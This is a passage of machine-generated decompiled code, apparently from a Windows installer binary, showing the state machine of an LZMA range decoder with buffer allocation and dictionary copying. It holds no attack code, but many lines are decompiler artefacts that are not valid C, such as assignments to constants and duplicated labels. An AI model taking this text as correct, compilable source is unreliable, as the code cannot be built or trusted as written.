												L15:
												if( *(_t613 - 0x48) < 4) {
													goto L13;
												}
												_t546 =  *(_t613 - 0x40);
												if(_t546 ==  *(_t613 - 0x74)) {
													L20:
													 *(_t613 - 0x48) = 5;
													 *( *(_t613 - 8) +  *(_t613 - 0x74) - 1) =  *( *(_t613 - 8) +  *(_t613 - 0x74) - 1) & 0x00000000;
													goto L23;
												}
												 *(_t613 - 0x74) = _t546;
												if( *(_t613 - 8) != 0) {
													GlobalFree( *(_t613 - 8));
												}
												_t534 = GlobalAlloc(0x40,  *(_t613 - 0x40)); // executed
												 *(_t613 - 8) = _t534;
												if(_t534 == 0) {
													goto L171;
												} else {
													goto L20;
												}
											case 2:
												L24:
												_t553 =  *(_t613 - 0x60) &  *(_t613 - 0x1c);
												 *(_t613 - 0x84) = 6;
												 *(_t613 - 0x4c) = _t553;
												_t606 =  *(_t613 - 4) + (( *(_t613 - 0x38) << 4) + _t553) * 2;
												L132:
												 *(_t613 - 0x54) = _t606;
												goto L133;
											case 3:
												L21:
												__eflags =  *(_t613 - 0x6c);
												if( *(_t613 - 0x6c) == 0) {
													 *(_t613 - 0x88) = 3;
													goto L170;
												}
												 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
												_t67 = _t613 - 0x70;
												 *_t67 =  &(( *(_t613 - 0x70))[1]);
												__eflags =  *_t67;
												 *(_t613 - 0xc) =  *(_t613 - 0xc) << 0x00000008 |  *( *(_t613 - 0x70)) & 0x000000ff;
												L23:
												 *(_t613 - 0x48) =  *(_t613 - 0x48) - 1;
												if( *(_t613 - 0x48) != 0) {
													goto L21;
												}
												goto L24;
											case 4:
												L133:
												_t531 =  *_t606;
												_t589 = _t531 & 0x0000ffff;
												_t565 = ( *(_t613 - 0x10) >> 0xb) * _t589;
												if( *(_t613 - 0xc) >= _t565) {
													 *(_t613 - 0x10) =  *(_t613 - 0x10) - _t565;
													 *(_t613 - 0xc) =  *(_t613 - 0xc) - _t565;
													 *(_t613 - 0x40) = 1;
													_t532 = _t531 - (_t531 >> 5);
													 *_t606 = _t532;
												} else {
													 *(_t613 - 0x10) = _t565;
													 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
													 *_t606 = (0x800 - _t589 >> 5) + _t531;
												}
												if( *(_t613 - 0x10) >= 0x1000000) {
													goto L139;
												}
											case 5:
												goto L137;
											case 6:
												__edx = 0;
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													__eax =  *(__ebp - 4);
													__ecx =  *(__ebp - 0x38);
													 *(__ebp - 0x34) = 1;
													 *(__ebp - 0x84) = 7;
													__esi =  *(__ebp - 4) + 0x180 +  *(__ebp - 0x38) * 2;
													while(1) {
														L132:
														 *(_t613 - 0x54) = _t606;
														goto L133;
													}
												}
												__eax =  *(__ebp - 0x5c) & 0x000000ff;
												__esi =  *(__ebp - 0x60);
												__cl = 8;
												__cl = 8 -  *(__ebp - 0x3c);
												__esi =  *(__ebp - 0x60) &  *(__ebp - 0x18);
												__eax = ( *(__ebp - 0x5c) & 0x000000ff) >> 8;
												__ecx =  *(__ebp - 0x3c);
												__esi = ( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8;
												__ecx =  *(__ebp - 4);
												(( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2;
												__eax = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9;
												__eflags =  *(__ebp - 0x38) - 4;
												__eax = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
												 *(__ebp - 0x58) = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
												if( *(__ebp - 0x38) >= 4) {
													__eflags =  *(__ebp - 0x38) - 0xa;
													if( *(__ebp - 0x38) >= 0xa) {
														_t98 = __ebp - 0x38;
														 *_t98 =  *(__ebp - 0x38) - 6;
														__eflags =  *_t98;
													} else {
														 *(__ebp - 0x38) =  *(__ebp - 0x38) - 3;
													}
												} else {
													 *(__ebp - 0x38) = 0;
												}
												__eflags =  *(__ebp - 0x34) - __edx;
												if( *(__ebp - 0x34) == __edx) {
													__ebx = 0;
													__ebx = 1;
													goto L61;
												} else {
													__eax =  *(__ebp - 0x14);
													__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
													__eflags = __eax -  *(__ebp - 0x74);
													if(__eax >=  *(__ebp - 0x74)) {
														__eax = __eax +  *(__ebp - 0x74);
														__eflags = __eax;
													}
													__ecx =  *(__ebp - 8);
													__ebx = 0;
													__ebx = 1;
													__al =  *((intOrPtr*)(__eax + __ecx));
													 *(__ebp - 0x5b) =  *((intOrPtr*)(__eax + __ecx));
													goto L41;
												}
											case 7:
												__eflags =  *(__ebp - 0x40) - 1;
												if( *(__ebp - 0x40) != 1) {
													__eax =  *(__ebp - 0x24);
													 *(__ebp - 0x80) = 0x16;
													 *(__ebp - 0x20) =  *(__ebp - 0x24);
													__eax =  *(__ebp - 0x28);
													 *(__ebp - 0x24) =  *(__ebp - 0x28);
													__eax =  *(__ebp - 0x2c);
													 *(__ebp - 0x28) =  *(__ebp - 0x2c);
													__eax = 0;
													__eflags =  *(__ebp - 0x38) - 7;
													0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
													__al = __al & 0x000000fd;
													__eax = (__eflags >= 0) - 1 + 0xa;
													 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xa;
													__eax =  *(__ebp - 4);
													__eax =  *(__ebp - 4) + 0x664;
													__eflags = __eax;
													 *(__ebp - 0x58) = __eax;
													goto L69;
												}
												__eax =  *(__ebp - 4);
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x84) = 8;
												__esi =  *(__ebp - 4) + 0x198 +  *(__ebp - 0x38) * 2;
												while(1) {
													L132:
													 *(_t613 - 0x54) = _t606;
													goto L133;
												}
											case 8:
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													__eax =  *(__ebp - 4);
													__ecx =  *(__ebp - 0x38);
													 *(__ebp - 0x84) = 0xa;
													__esi =  *(__ebp - 4) + 0x1b0 +  *(__ebp - 0x38) * 2;
												} else {
													__eax =  *(__ebp - 0x38);
													__ecx =  *(__ebp - 4);
													__eax =  *(__ebp - 0x38) + 0xf;
													 *(__ebp - 0x84) = 9;
													 *(__ebp - 0x38) + 0xf << 4 = ( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c);
													__esi =  *(__ebp - 4) + (( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c)) * 2;
												}
												while(1) {
													L132:
													 *(_t613 - 0x54) = _t606;
													goto L133;
												}
											case 9:
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													goto L89;
												}
												__eflags =  *(__ebp - 0x60);
												if( *(__ebp - 0x60) == 0) {
													goto L171;
												}
												__eax = 0;
												__eflags =  *(__ebp - 0x38) - 7;
												_t259 =  *(__ebp - 0x38) - 7 >= 0;
												__eflags = _t259;
												0 | _t259 = _t259 + _t259 + 9;
												 *(__ebp - 0x38) = _t259 + _t259 + 9;
												goto L76;
											case 0xa:
												goto L0;
											case 0xb:
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													__ecx =  *(__ebp - 0x24);
													__eax =  *(__ebp - 0x20);
													 *(__ebp - 0x20) =  *(__ebp - 0x24);
												} else {
													__eax =  *(__ebp - 0x24);
												}
												__ecx =  *(__ebp - 0x28);
												 *(__ebp - 0x24) =  *(__ebp - 0x28);
												goto L88;
											case 0xc:
												L99:
												__eflags =  *(__ebp - 0x6c);
												if( *(__ebp - 0x6c) == 0) {
													 *(__ebp - 0x88) = 0xc;
													goto L170;
												}
												__ecx =  *(__ebp - 0x70);
												__eax =  *(__ebp - 0xc);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												_t334 = __ebp - 0x70;
												 *_t334 =  *(__ebp - 0x70) + 1;
												__eflags =  *_t334;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												__eax =  *(__ebp - 0x2c);
												goto L101;
											case 0xd:
												L37:
												__eflags =  *(__ebp - 0x6c);
												if( *(__ebp - 0x6c) == 0) {
													 *(__ebp - 0x88) = 0xd;
													goto L170;
												}
												__ecx =  *(__ebp - 0x70);
												__eax =  *(__ebp - 0xc);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												_t122 = __ebp - 0x70;
												 *_t122 =  *(__ebp - 0x70) + 1;
												__eflags =  *_t122;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												L39:
												__eax =  *(__ebp - 0x40);
												__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
												if( *(__ebp - 0x48) !=  *(__ebp - 0x40)) {
													goto L48;
												}
												__eflags = __ebx - 0x100;
												if(__ebx >= 0x100) {
													goto L54;
												}
												L41:
												__eax =  *(__ebp - 0x5b) & 0x000000ff;
												 *(__ebp - 0x5b) =  *(__ebp - 0x5b) << 1;
												__ecx =  *(__ebp - 0x58);
												__eax = ( *(__ebp - 0x5b) & 0x000000ff) >> 7;
												 *(__ebp - 0x48) = __eax;
												__eax = __eax + 1;
												__eax = __eax << 8;
												__eax = __eax + __ebx;
												__esi =  *(__ebp - 0x58) + __eax * 2;
												 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
												__ax =  *__esi;
												 *(__ebp - 0x54) = __esi;
												__edx = __ax & 0x0000ffff;
												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edx;
												__eflags =  *(__ebp - 0xc) - __ecx;
												if( *(__ebp - 0xc) >= __ecx) {
													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
													__cx = __ax;
													 *(__ebp - 0x40) = 1;
													__cx = __ax >> 5;
													__eflags = __eax;
													__ebx = __ebx + __ebx + 1;
													 *__esi = __ax;
												} else {
													 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000000;
													 *(__ebp - 0x10) = __ecx;
													0x800 = 0x800 - __edx;
													0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
													__ebx = __ebx + __ebx;
													 *__esi = __cx;
												}
												__eflags =  *(__ebp - 0x10) - 0x1000000;
												 *(__ebp - 0x44) = __ebx;
												if( *(__ebp - 0x10) >= 0x1000000) {
													goto L39;
												} else {
													goto L37;
												}
											case 0xe:
												L46:
												__eflags =  *(__ebp - 0x6c);
												if( *(__ebp - 0x6c) == 0) {
													 *(__ebp - 0x88) = 0xe;
													goto L170;
												}
												__ecx =  *(__ebp - 0x70);
												__eax =  *(__ebp - 0xc);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												_t156 = __ebp - 0x70;
												 *_t156 =  *(__ebp - 0x70) + 1;
												__eflags =  *_t156;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												while(1) {
													L48:
													__eflags = __ebx - 0x100;
													if(__ebx >= 0x100) {
														break;
													}
													__eax =  *(__ebp - 0x58);
													__edx = __ebx + __ebx;
													__ecx =  *(__ebp - 0x10);
													__esi = __edx + __eax;
													__ecx =  *(__ebp - 0x10) >> 0xb;
													__ax =  *__esi;
													 *(__ebp - 0x54) = __esi;
													__edi = __ax & 0x0000ffff;
													__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
													__eflags =  *(__ebp - 0xc) - __ecx;
													if( *(__ebp - 0xc) >= __ecx) {
														 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
														 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
														__cx = __ax;
														_t170 = __edx + 1; // 0x1
														__ebx = _t170;
														__cx = __ax >> 5;
														__eflags = __eax;
														 *__esi = __ax;
													} else {
														 *(__ebp - 0x10) = __ecx;
														0x800 = 0x800 - __edi;
														0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
														__ebx = __ebx + __ebx;
														 *__esi = __cx;
													}
													__eflags =  *(__ebp - 0x10) - 0x1000000;
													 *(__ebp - 0x44) = __ebx;
													if( *(__ebp - 0x10) >= 0x1000000) {
														continue;
													} else {
														goto L46;
													}
												}
												L54:
												_t173 = __ebp - 0x34;
												 *_t173 =  *(__ebp - 0x34) & 0x00000000;
												__eflags =  *_t173;
												goto L55;
											case 0xf:
												L58:
												__eflags =  *(__ebp - 0x6c);
												if( *(__ebp - 0x6c) == 0) {
													 *(__ebp - 0x88) = 0xf;
													goto L170;
												}
												__ecx =  *(__ebp - 0x70);
												__eax =  *(__ebp - 0xc);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												_t203 = __ebp - 0x70;
												 *_t203 =  *(__ebp - 0x70) + 1;
												__eflags =  *_t203;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												L60:
												__eflags = __ebx - 0x100;
												if(__ebx >= 0x100) {
													L55:
													__al =  *(__ebp - 0x44);
													 *(__ebp - 0x5c) =  *(__ebp - 0x44);
													goto L56;
												}
												L61:
												__eax =  *(__ebp - 0x58);
												__edx = __ebx + __ebx;
												__ecx =  *(__ebp - 0x10);
												__esi = __edx + __eax;
												__ecx =  *(__ebp - 0x10) >> 0xb;
												__ax =  *__esi;
												 *(__ebp - 0x54) = __esi;
												__edi = __ax & 0x0000ffff;
												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
												__eflags =  *(__ebp - 0xc) - __ecx;
												if( *(__ebp - 0xc) >= __ecx) {
													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
													__cx = __ax;
													_t217 = __edx + 1; // 0x1
													__ebx = _t217;
													__cx = __ax >> 5;
													__eflags = __eax;
													 *__esi = __ax;
												} else {
													 *(__ebp - 0x10) = __ecx;
													0x800 = 0x800 - __edi;
													0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
													__ebx = __ebx + __ebx;
													 *__esi = __cx;
												}
												__eflags =  *(__ebp - 0x10) - 0x1000000;
												 *(__ebp - 0x44) = __ebx;
												if( *(__ebp - 0x10) >= 0x1000000) {
													goto L60;
												} else {
													goto L58;
												}
											case 0x10:
												L109:
												__eflags =  *(__ebp - 0x6c);
												if( *(__ebp - 0x6c) == 0) {
													 *(__ebp - 0x88) = 0x10;
													goto L170;
												}
												__ecx =  *(__ebp - 0x70);
												__eax =  *(__ebp - 0xc);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												_t365 = __ebp - 0x70;
												 *_t365 =  *(__ebp - 0x70) + 1;
												__eflags =  *_t365;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												goto L111;
											case 0x11:
												goto L69;
											case 0x12:
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													__eax =  *(__ebp - 0x58);
													 *(__ebp - 0x84) = 0x13;
													__esi =  *(__ebp - 0x58) + 2;
													while(1) {
														L132:
														 *(_t613 - 0x54) = _t606;
														goto L133;
													}
												}
												__eax =  *(__ebp - 0x4c);
												 *(__ebp - 0x30) =  *(__ebp - 0x30) & 0x00000000;
												__ecx =  *(__ebp - 0x58);
												__eax =  *(__ebp - 0x4c) << 4;
												__eflags = __eax;
												__eax =  *(__ebp - 0x58) + __eax + 4;
												goto L130;
											case 0x13:
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													_t469 = __ebp - 0x58;
													 *_t469 =  *(__ebp - 0x58) + 0x204;
													__eflags =  *_t469;
													 *(__ebp - 0x30) = 0x10;
													 *(__ebp - 0x40) = 8;
													L144:
													 *(__ebp - 0x7c) = 0x14;
													goto L145;
												}
												__eax =  *(__ebp - 0x4c);
												__ecx =  *(__ebp - 0x58);
												__eax =  *(__ebp - 0x4c) << 4;
												 *(__ebp - 0x30) = 8;
												__eax =  *(__ebp - 0x58) + ( *(__ebp - 0x4c) << 4) + 0x104;
												L130:
												 *(__ebp - 0x58) = __eax;
												 *(__ebp - 0x40) = 3;
												goto L144;
											case 0x14:
												 *(__ebp - 0x30) =  *(__ebp - 0x30) + __ebx;
												__eax =  *(__ebp - 0x80);
												 *(_t613 - 0x88) = _t533;
												goto L1;
											case 0x15:
												__eax = 0;
												__eflags =  *(__ebp - 0x38) - 7;
												0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
												__al = __al & 0x000000fd;
												__eax = (__eflags >= 0) - 1 + 0xb;
												 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xb;
												goto L120;
											case 0x16:
												__eax =  *(__ebp - 0x30);
												__eflags = __eax - 4;
												if(__eax >= 4) {
													_push(3);
													_pop(__eax);
												}
												__ecx =  *(__ebp - 4);
												 *(__ebp - 0x40) = 6;
												__eax = __eax << 7;
												 *(__ebp - 0x7c) = 0x19;
												 *(__ebp - 0x58) = __eax;
												goto L145;
											case 0x17:
												L145:
												__eax =  *(__ebp - 0x40);
												 *(__ebp - 0x50) = 1;
												 *(__ebp - 0x48) =  *(__ebp - 0x40);
												goto L149;
											case 0x18:
												L146:
												__eflags =  *(__ebp - 0x6c);
												if( *(__ebp - 0x6c) == 0) {
													 *(__ebp - 0x88) = 0x18;
													goto L170;
												}
												__ecx =  *(__ebp - 0x70);
												__eax =  *(__ebp - 0xc);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												_t484 = __ebp - 0x70;
												 *_t484 =  *(__ebp - 0x70) + 1;
												__eflags =  *_t484;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												L148:
												_t487 = __ebp - 0x48;
												 *_t487 =  *(__ebp - 0x48) - 1;
												__eflags =  *_t487;
												L149:
												__eflags =  *(__ebp - 0x48);
												if( *(__ebp - 0x48) <= 0) {
													__ecx =  *(__ebp - 0x40);
													__ebx =  *(__ebp - 0x50);
													0 = 1;
													__eax = 1 << __cl;
													__ebx =  *(__ebp - 0x50) - (1 << __cl);
													__eax =  *(__ebp - 0x7c);
													 *(__ebp - 0x44) = __ebx;
													while(1) {
														 *(_t613 - 0x88) = _t533;
														goto L1;
													}
												}
												__eax =  *(__ebp - 0x50);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
												__edx =  *(__ebp - 0x50) +  *(__ebp - 0x50);
												__eax =  *(__ebp - 0x58);
												__esi = __edx + __eax;
												 *(__ebp - 0x54) = __esi;
												__ax =  *__esi;
												__edi = __ax & 0x0000ffff;
												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
												__eflags =  *(__ebp - 0xc) - __ecx;
												if( *(__ebp - 0xc) >= __ecx) {
													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
													__cx = __ax;
													__cx = __ax >> 5;
													__eax = __eax - __ecx;
													__edx = __edx + 1;
													__eflags = __edx;
													 *__esi = __ax;
													 *(__ebp - 0x50) = __edx;
												} else {
													 *(__ebp - 0x10) = __ecx;
													0x800 = 0x800 - __edi;
													0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
													 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
													 *__esi = __cx;
												}
												__eflags =  *(__ebp - 0x10) - 0x1000000;
												if( *(__ebp - 0x10) >= 0x1000000) {
													goto L148;
												} else {
													goto L146;
												}
											case 0x19:
												__eflags = __ebx - 4;
												if(__ebx < 4) {
													 *(__ebp - 0x2c) = __ebx;
													L119:
													_t393 = __ebp - 0x2c;
													 *_t393 =  *(__ebp - 0x2c) + 1;
													__eflags =  *_t393;
													L120:
													__eax =  *(__ebp - 0x2c);
													__eflags = __eax;
													if(__eax == 0) {
														 *(__ebp - 0x30) =  *(__ebp - 0x30) | 0xffffffff;
														goto L170;
													}
													__eflags = __eax -  *(__ebp - 0x60);
													if(__eax >  *(__ebp - 0x60)) {
														goto L171;
													}
													 *(__ebp - 0x30) =  *(__ebp - 0x30) + 2;
													__eax =  *(__ebp - 0x30);
													_t400 = __ebp - 0x60;
													 *_t400 =  *(__ebp - 0x60) +  *(__ebp - 0x30);
													__eflags =  *_t400;
													goto L123;
												}
												__ecx = __ebx;
												__eax = __ebx;
												__ecx = __ebx >> 1;
												__eax = __ebx & 0x00000001;
												__ecx = (__ebx >> 1) - 1;
												__al = __al | 0x00000002;
												__eax = (__ebx & 0x00000001) << __cl;
												__eflags = __ebx - 0xe;
												 *(__ebp - 0x2c) = __eax;
												if(__ebx >= 0xe) {
													__ebx = 0;
													 *(__ebp - 0x48) = __ecx;
													L102:
													__eflags =  *(__ebp - 0x48);
													if( *(__ebp - 0x48) <= 0) {
														__eax = __eax + __ebx;
														 *(__ebp - 0x40) = 4;
														 *(__ebp - 0x2c) = __eax;
														__eax =  *(__ebp - 4);
														__eax =  *(__ebp - 4) + 0x644;
														__eflags = __eax;
														L108:
														__ebx = 0;
														 *(__ebp - 0x58) = __eax;
														 *(__ebp - 0x50) = 1;
														 *(__ebp - 0x44) = 0;
														 *(__ebp - 0x48) = 0;
														L112:
														__eax =  *(__ebp - 0x40);
														__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
														if( *(__ebp - 0x48) >=  *(__ebp - 0x40)) {
															_t391 = __ebp - 0x2c;
															 *_t391 =  *(__ebp - 0x2c) + __ebx;
															__eflags =  *_t391;
															goto L119;
														}
														__eax =  *(__ebp - 0x50);
														 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
														__edi =  *(__ebp - 0x50) +  *(__ebp - 0x50);
														__eax =  *(__ebp - 0x58);
														__esi = __edi + __eax;
														 *(__ebp - 0x54) = __esi;
														__ax =  *__esi;
														__ecx = __ax & 0x0000ffff;
														__edx = ( *(__ebp - 0x10) >> 0xb) * __ecx;
														__eflags =  *(__ebp - 0xc) - __edx;
														if( *(__ebp - 0xc) >= __edx) {
															__ecx = 0;
															 *(__ebp - 0x10) =  *(__ebp - 0x10) - __edx;
															__ecx = 1;
															 *(__ebp - 0xc) =  *(__ebp - 0xc) - __edx;
															__ebx = 1;
															__ecx =  *(__ebp - 0x48);
															__ebx = 1 << __cl;
															__ecx = 1 << __cl;
															__ebx =  *(__ebp - 0x44);
															__ebx =  *(__ebp - 0x44) | __ecx;
															__cx = __ax;
															__cx = __ax >> 5;
															__eax = __eax - __ecx;
															__edi = __edi + 1;
															__eflags = __edi;
															 *(__ebp - 0x44) = __ebx;
															 *__esi = __ax;
															 *(__ebp - 0x50) = __edi;
														} else {
															 *(__ebp - 0x10) = __edx;
															0x800 = 0x800 - __ecx;
															0x800 - __ecx >> 5 = (0x800 - __ecx >> 5) + __eax;
															 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
															 *__esi = __dx;
														}
														__eflags =  *(__ebp - 0x10) - 0x1000000;
														if( *(__ebp - 0x10) >= 0x1000000) {
															L111:
															_t368 = __ebp - 0x48;
															 *_t368 =  *(__ebp - 0x48) + 1;
															__eflags =  *_t368;
															goto L112;
														} else {
															goto L109;
														}
													}
													__ecx =  *(__ebp - 0xc);
													__ebx = __ebx + __ebx;
													 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 1;
													__eflags =  *(__ebp - 0xc) -  *(__ebp - 0x10);
													 *(__ebp - 0x44) = __ebx;
													if( *(__ebp - 0xc) >=  *(__ebp - 0x10)) {
														__ecx =  *(__ebp - 0x10);
														 *(__ebp - 0xc) =  *(__ebp - 0xc) -  *(__ebp - 0x10);
														__ebx = __ebx | 0x00000001;
														__eflags = __ebx;
														 *(__ebp - 0x44) = __ebx;
													}
													__eflags =  *(__ebp - 0x10) - 0x1000000;
													if( *(__ebp - 0x10) >= 0x1000000) {
														L101:
														_t338 = __ebp - 0x48;
														 *_t338 =  *(__ebp - 0x48) - 1;
														__eflags =  *_t338;
														goto L102;
													} else {
														goto L99;
													}
												}
												__edx =  *(__ebp - 4);
												__eax = __eax - __ebx;
												 *(__ebp - 0x40) = __ecx;
												__eax =  *(__ebp - 4) + 0x55e + __eax * 2;
												goto L108;
											case 0x1a:
												L56:
												__eflags =  *(__ebp - 0x64);
												if( *(__ebp - 0x64) == 0) {
													 *(__ebp - 0x88) = 0x1a;
													goto L170;
												}
												__ecx =  *(__ebp - 0x68);
												__al =  *(__ebp - 0x5c);
												__edx =  *(__ebp - 8);
												 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
												 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
												 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
												 *( *(__ebp - 0x68)) = __al;
												__ecx =  *(__ebp - 0x14);
												 *(__ecx +  *(__ebp - 8)) = __al;
												__eax = __ecx + 1;
												__edx = 0;
												_t192 = __eax %  *(__ebp - 0x74);
												__eax = __eax /  *(__ebp - 0x74);
												__edx = _t192;
												goto L80;
											case 0x1b:
												L76:
												__eflags =  *(__ebp - 0x64);
												if( *(__ebp - 0x64) == 0) {
													 *(__ebp - 0x88) = 0x1b;
													goto L170;
												}
												__eax =  *(__ebp - 0x14);
												__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
												__eflags = __eax -  *(__ebp - 0x74);
												if(__eax >=  *(__ebp - 0x74)) {
													__eax = __eax +  *(__ebp - 0x74);
													__eflags = __eax;
												}
												__edx =  *(__ebp - 8);
												__cl =  *(__eax + __edx);
												__eax =  *(__ebp - 0x14);
												 *(__ebp - 0x5c) = __cl;
												 *(__eax + __edx) = __cl;
												__eax = __eax + 1;
												__edx = 0;
												_t275 = __eax %  *(__ebp - 0x74);
												__eax = __eax /  *(__ebp - 0x74);
												__edx = _t275;
												__eax =  *(__ebp - 0x68);
												 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
												 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
												_t284 = __ebp - 0x64;
												 *_t284 =  *(__ebp - 0x64) - 1;
												__eflags =  *_t284;
												 *( *(__ebp - 0x68)) = __cl;
												L80:
												 *(__ebp - 0x14) = __edx;
												goto L81;
											case 0x1c:
												while(1) {
													L123:
													__eflags =  *(__ebp - 0x64);
													if( *(__ebp - 0x64) == 0) {
														break;
													}
													__eax =  *(__ebp - 0x14);
													__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
													__eflags = __eax -  *(__ebp - 0x74);
													if(__eax >=  *(__ebp - 0x74)) {
														__eax = __eax +  *(__ebp - 0x74);
														__eflags = __eax;
													}
													__edx =  *(__ebp - 8);
													__cl =  *(__eax + __edx);
													__eax =  *(__ebp - 0x14);
													 *(__ebp - 0x5c) = __cl;
													 *(__eax + __edx) = __cl;
													__eax = __eax + 1;
													__edx = 0;
													_t414 = __eax %  *(__ebp - 0x74);
													__eax = __eax /  *(__ebp - 0x74);
													__edx = _t414;
													__eax =  *(__ebp - 0x68);
													 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
